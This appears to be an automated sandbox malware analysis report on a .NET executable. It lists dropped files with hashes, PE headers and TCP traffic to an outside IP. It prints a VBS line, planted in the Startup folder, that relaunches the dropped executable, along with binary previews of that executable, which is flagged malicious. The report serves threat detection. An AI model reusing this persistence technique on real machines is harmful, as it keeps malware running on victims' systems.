                                    SHA-512:11223FC289B56C59B775B9C674325C7074318EB14A5355FA6F53FE2FD681E2A7D5B6ECE374DDCC2672E6DE7F53C8FE3661EE78407817D3D6937566302C2204CB
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC448.tmp.dmp

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Fri Jan 10 21:30:42 2025, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):367602
                                    Entropy (8bit):4.528843028025862
                                    Encrypted:false
                                    SSDEEP:6144:wj7qzrkASUtZI4xieu0BDQWEvnVP2CZGyu+/3IL:w6z9xxieuiWVP/wi/I
                                    MD5:0DD61E8ADD6C738641D05508B498E7B7
                                    SHA1:85C02E4B86BACD547705C05A3EF28504C70DA21E
                                    SHA-256:872D9B228CDC3EBD03A12315B7F7896F2A511B106DC6CA73878E2864F18986AA
                                    SHA-512:D9B94443F2F5FAB051EB01AB143D725ED75FBE6C2FDC097A5EADBF855794476F5E750D43FAF6BCB69CD226989DBBE5C825AAA20B33330E91AD36A140741B551D
                                    Malicious:false
                                    Preview:MDMP..a..... ..........g............t............ ..........<....*.......-...]..........`.......8...........T...........XX...C..........D*..........0,..............................................................................eJ.......,......GenuineIntel............T...........t..g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5B0.tmp.WERInternalMetadata.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):6396
                                    Entropy (8bit):3.713242533681323
                                    Encrypted:false
                                    SSDEEP:96:RSIU6o7wVetbnl6zazYZxQE/5Zy5aM4UG89b40sfWIm:R6l7wVeJnl6WzYZx2prG89b40sfWIm
                                    MD5:ED121DC58C62A9E117B71E9C29340AF3
                                    SHA1:662463F9FA0FECC0E074973809A59E76E2914FA8
                                    SHA-256:21683775C42175BCAEEA893A113E211967149D6365313063CD5240B060F6512B
                                    SHA-512:A5BF79E13670D1C41C1B233D0A558A390B0C476910EFE07F173D52068D3E2433D85BA4C566E6168DDC953957468D7A369A830EDA16DB31BB91BCF7F069F8903F
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.6.0.0.<./.P.i.

                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC5F0.tmp.xml

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4761
                                    Entropy (8bit):4.460091050606965
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsoJg77aI9sAoXWpW8VY3Ym8M4Ja6h6JsFpHd+q8vg6JwGC36UI06Uvd:uIjfuI7eAom7VvJRE4HdKfxCKUgUvd
                                    MD5:0FE9D655E16588079B951B32B240B25A
                                    SHA1:E706AE85597D2A1ADD60BBFA60255D84DD1FAB38
                                    SHA-256:6F9190A26B172846D5E28870C7E37499951555A0D5C259CF997C0FB36E3D343D
                                    SHA-512:922F9440AC95B2639AF50172D036ECFC7E882A6EEDBC3AD4FF0D873096B56D8AC04B1F7DB82557C62E260F531C89AA27EED0F597210471B0CD413FA1B554FE7D
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670353" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                    C:\Users\user\AppData\Roaming\DisplayName.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\3pwbTZtiDu.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):15360
                                    Entropy (8bit):5.781141552672248
                                    Encrypted:false
                                    SSDEEP:192:fVklYqTjd6SDAxRWFG0E6/5SiVLYRh50mt1brDvy/MxOkN3/ko:fiGql6SDZV45H3vy/MxOkNs
                                    MD5:3209478AF7484C36341D0939FB84CB88
                                    SHA1:7D4C3AD42D2D9F8EE8AF1A92F28AB2651E799483
                                    SHA-256:5F031A5E3DE3E7DF29A8EF6ADB4164A620592ED3A5EE8735D779984B9EAFC4C5
                                    SHA-512:0DDAC3EBEB18B68F935C3C4292625AF3261230362FD54AD967679659E2C9285CE4DC80542F0E5478891691668CBE287FFD8821AB9A5AC15302B2516E58113792
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 70%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\{Wg.............................+... ...@....@.. ....................................`.................................d+..W....@...+........................................................................... ............... ..H............text........ ...................... ..`.rsrc....+...@...,..................@..@.reloc...............:..............@..B.................+......H.......@!..$...........................................................2r...p(....&*B(....(....o....*2(.....o....*......(....r...p(.....(....(...+o....*....0..s.......s......r...p(....o.....rG..p(....o.....o.......8.....s....ra..p(..........&......,......io...........9.....o......*.......5..J..........^d......BSJB............v4.0.30319......l.......#~..`.......#Strings....t...(...#US.........#GUID.......x...#Blob...........G.........%3........................................

                                    C:\Users\user\AppData\Roaming\DisplayName.exe:Zone.Identifier

                                    Download File
                                    Process:C:\Users\user\Desktop\3pwbTZtiDu.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DisplayName.vbs

                                    Download File
                                    Process:C:\Users\user\Desktop\3pwbTZtiDu.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):86
                                    Entropy (8bit):4.757360249640116
                                    Encrypted:false
                                    SSDEEP:3:FER/n0eFHHoaa4EaKC5d4crW0diHHn:FER/lFHIvaZ53Ckin
                                    MD5:9F25922996678F39FAE65702F293F8D5
                                    SHA1:6FA0A414980316FAFE16F89CC7ECAFA018C09DC2
                                    SHA-256:C106B378EBAF1D694786A546E5684862AFCCFD5B616905CA48A38AAD33AC8112
                                    SHA-512:EE1245C0A32B15120163A86DE1B03D8F0FA51F8DB2D9C8EB779064D3BCCBBF10EF8684D281498067A52197CBC26236ACE8A19B7282D1C353F12F48AE4CC45B75
                                    Malicious:true
                                    Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\DisplayName.exe"""

                                    C:\Windows\appcompat\Programs\Amcache.hve

                                    Download File
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:MS Windows registry file, NT/2000 or above
                                    Category:dropped
                                    Size (bytes):1835008
                                    Entropy (8bit):4.5686812186952706
                                    Encrypted:false
                                    SSDEEP:6144:QoPefZnQMa3tfL+bn90foomgsattlbSldrUHT7hSgkSNv0juQJYchUJvTGAxBsL6:dPAAooVJHnsg/d1T/qG
                                    MD5:87AA157F29D772F1243315AABED255F2
                                    SHA1:CCBDD34A70762BFF63E448591D9F63E593DE6FB8
                                    SHA-256:CB84DADEECC419393210CC8C1A1AA7F747B904D77CFCF16386870AA9EBE7D210
                                    SHA-512:2B67651CC0C7D45FC697CDD15B21A58073B60E4AAE654853F1541A44ACFE1204F70FB2AFBD48755449D706B01245D1CA4E8A285728B270B08B498C83FD42FC15
                                    Malicious:false
                                    Preview:regfJ...J....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm....c..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):5.781141552672248
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:3pwbTZtiDu.exe
                                    File size:15'360 bytes
                                    MD5:3209478af7484c36341d0939fb84cb88
                                    SHA1:7d4c3ad42d2d9f8ee8af1a92f28ab2651e799483
                                    SHA256:5f031a5e3de3e7df29a8ef6adb4164a620592ed3a5ee8735d779984b9eafc4c5
                                    SHA512:0ddac3ebeb18b68f935c3c4292625af3261230362fd54ad967679659e2c9285ce4dc80542f0e5478891691668cbe287ffd8821ab9a5ac15302b2516e58113792
                                    SSDEEP:192:fVklYqTjd6SDAxRWFG0E6/5SiVLYRh50mt1brDvy/MxOkN3/ko:fiGql6SDZV45H3vy/MxOkNs
                                    TLSH:4762A81372F01B6FFC3115B6546B13C19F24A076A8C5BBAD20E2D67B5C8AF2541F1729
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\{Wg.............................+... ...@....@.. ....................................`................................

                                    File Icon

                                    Icon Hash:8e8a62f305051134

                                    Static PE Info

                                    General

                                    Entrypoint:0x402bbe
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x67577B5C [Mon Dec 9 23:21:00 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2b640x57.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x2be2.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000xbc40xc009885946835a29da42aa87ab2e2c283b3False0.5830078125data5.2671197488660235IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x40000x2be20x2c005e1c661ba72c17c68b5d9ec29f9dd497False0.42134232954545453data5.595089373124542IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x80000xc0x200505a344d0ea836f3b8967a732f11f3aeFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x41300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4066390041493776
                                    RT_GROUP_ICON0x66d80x14data1.15
                                    RT_VERSION0x66ec0x30cdata0.4230769230769231
                                    RT_MANIFEST0x69f80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                    Imports

                                    DLLImport
                                    mscoree.dll_CorExeMain

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 10, 2025 22:30:06.896795034 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:06.896833897 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:06.896933079 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:06.911978006 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:06.912003994 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:07.649405003 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:07.649504900 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:07.653517962 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:07.653533936 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:07.653841019 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:07.693969011 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:07.842257977 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:07.883332014 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187361956 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187386990 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187395096 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187452078 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187510014 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187527895 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.187545061 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.187580109 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.187602043 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.188841105 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.188860893 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.188947916 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.188957930 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.240847111 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.325797081 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.325809956 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.325858116 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.325875044 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.326092958 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.326107979 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.326159954 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.327358961 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.327378035 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.327481985 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.327491045 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.327534914 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.329406977 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.329425097 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.329526901 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.329535007 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.329586029 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.332273006 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.332290888 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.332384109 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.332392931 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.332442999 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.448025942 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.448050022 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.448250055 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.448268890 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.448323011 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.448956013 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.448971987 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.449023962 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.449029922 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.449071884 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.449098110 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.450193882 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450211048 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450275898 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.450282097 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450336933 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.450860023 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450879097 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450941086 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.450946093 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.450994015 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.451931953 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.451948881 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.452023983 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.452030897 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.452069998 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.459376097 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.467288971 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.467309952 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.467433929 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.467447996 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.467495918 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.533934116 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.533955097 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.534152031 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.534167051 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.534228086 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.569497108 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.569514036 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.569587946 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.569601059 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.569623947 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.569715023 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.570312977 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.570329905 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.570384979 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.570394039 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.570453882 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.573854923 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.573869944 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.573928118 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.573944092 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.573964119 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.573983908 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.574884892 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.574903965 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.574965000 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.574971914 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.575045109 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.575257063 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.575272083 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.575587034 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.575587034 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.575594902 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.575706959 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.576023102 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.576040983 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.576101065 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.576107979 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.576173067 CET49710443192.168.2.125.23.51.54
                                    Jan 10, 2025 22:30:08.576817989 CET443497105.23.51.54192.168.2.12
                                    Jan 10, 2025 22:30:08.576838017 CET443497105.23.51.54192.168.2.12
